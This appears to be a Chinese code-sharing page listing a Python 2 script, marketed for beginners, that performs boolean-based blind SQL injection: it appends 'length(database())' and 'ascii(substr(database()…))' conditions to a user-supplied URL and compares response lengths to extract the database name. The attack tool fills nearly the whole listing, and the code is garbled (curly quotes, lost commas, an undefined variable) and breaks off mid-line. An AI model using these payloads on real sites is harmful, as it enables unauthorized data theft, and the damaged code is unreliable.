• 大小: 18KB
    文件类型: .py
    发布日期: 2021-06-18
  • 语言: Python
  • 标签: python  sql注入  

资源简介

适合刚学 Python 和 SQL 注入的人。代码片段开头为 import urllib2、import re(Python 2)。


代码片段和文件信息

# -*-coding:gbk-*-
import urllib2
import re

# Target URL, read interactively (the prompt text means "URL:"). raw_input is
# the Python 2 builtin. The value is used unvalidated as the prefix of every
# request URL assembled further down.
# NOTE(review): the quotes in this listing are typographic, so the line does
# not parse as shown — presumably plain ASCII quotes in the original file.
url=raw_input(“网址:“)

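def getpage(url):
    """Fetch *url* and return the length of the response body.

    Despite the name, the page content is not returned: only ``len()`` of
    the bytes read. The rest of the script compares these lengths against a
    baseline length, so this number is the only signal it works from.

    Errors raised by ``urllib2.urlopen`` are not caught here and propagate
    to the caller.
    """
    req = urllib2.Request(url)
    res = urllib2.urlopen(req)
    try:
        # Only the size of the body is kept; the content is discarded.
        return len(res.read())
    finally:
        # The original never closed the response. This function is called
        # once per probe, so unclosed responses pile up open sockets.
        res.close()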

# Baseline: body length of the unmodified URL. Each later probe response is
# compared with this number, and equality is read as "condition was true".
sureLen = getpage(url)

def getdblen(urlsureLen):
    """Return the first candidate length whose probe matches the baseline.

    Each iteration appends ``+and+length(database())=N+--+`` to ``url`` and
    fetches the result. A response whose body length equals ``sureLen`` is
    taken to mean the appended condition held (boolean-based blind inference
    from response size).

    NOTE(review): as listed, the single parameter is named ``urlsureLen``
    and the body reads the module-level ``url`` and ``sureLen``; this looks
    like ``url, sureLen`` with the comma lost in extraction. The string
    quotes are typographic, so the block does not parse as shown.
    """
    i = 0
    # No upper bound: if no candidate ever reproduces the baseline length,
    # this loop never terminates and keeps issuing requests.
    while 1:
        i = i + 1
        # The condition is concatenated onto the URL. It only has an effect
        # if the receiving application builds its SQL from that parameter by
        # string concatenation; a parameterized query treats it as data.
        # On the server side these requests differ only in the integer after
        # "length(database())=", which makes them a recognizable run in
        # access logs.
        lenurl = url + “+and+length(database())=“ + str(i) + “+--+“
        pageLen = getpage(lenurl)
        if sureLen == pageLen:
            return i

# NOTE(review): `urlsureLen` is not defined anywhere in this listing;
# presumably `url, sureLen` with the comma lost in extraction.
dblen = getdblen(urlsureLen)

# Python 2 print statement; the comma before dblen also appears to be missing.
print “dbname length is :“dblen
# Lookup table read as ls[u] in getdbname, where u is the character code being
# tested. The leading run of 'a' looks like padding so that printable
# characters sit at the index equal to their code — TODO confirm. In this
# listing the ',' expected between '+' and '-' is absent and the quote
# characters are typographic, so the indices shown here may be shifted
# relative to the original file.
ls = “aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!‘#$%&‘()*+-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_‘abcdefghijklmnopqrstuvwxyz{|}~“

def getdbname(urllssureLendblen):
    
    dbName = ““
    for i in range(1dblen+1):
        j = 96
        k = 128
        fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
        print fullUrl
        pageLen = getpage(fullUrl)
        if sureLen == pageLen:
            j = 111
            fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
            print fullUrl
            pageLen = getpage(fullUrl)
            if sureLen == pageLen:
                j = 119
                fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
                print fullUrl
                pageLen = getpage(fullUrl)
                if sureLen == pageLen:
                    j = 123
                    fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
                    print fullUrl
                    pageLen = getpage(fullUrl)
                    if sureLen == pageLen:
                        j = 125
                        fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))>“+str(j)+“--+“
                        print fullUrl
                        pageLen = getpage(fullUrl)
                        if sureLen == pageLen:
                            for u in range(126127):
                                fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))=“+str(u)+“--+“
                                print fullUrl
                                pageLen = getpage(fullUrl)
                                if sureLen == pageLen:
                                    dbName += ls[u]
                                    break
                                
                            
                        else:
                            for u in range(124126):
                                fullUrl=url + “+and+ascii(substr(database()“+str(i)+“1))=“+str(u)+“--+“
                                print fullUrl
                                pageLen = getpage(fullUrl)
                                if sureLen == pageLen:
                                    dbName += ls[u]
                                    break
                    else:
                        j = 121
                        fullUrl=url + “+and+ascii(substr(database()“
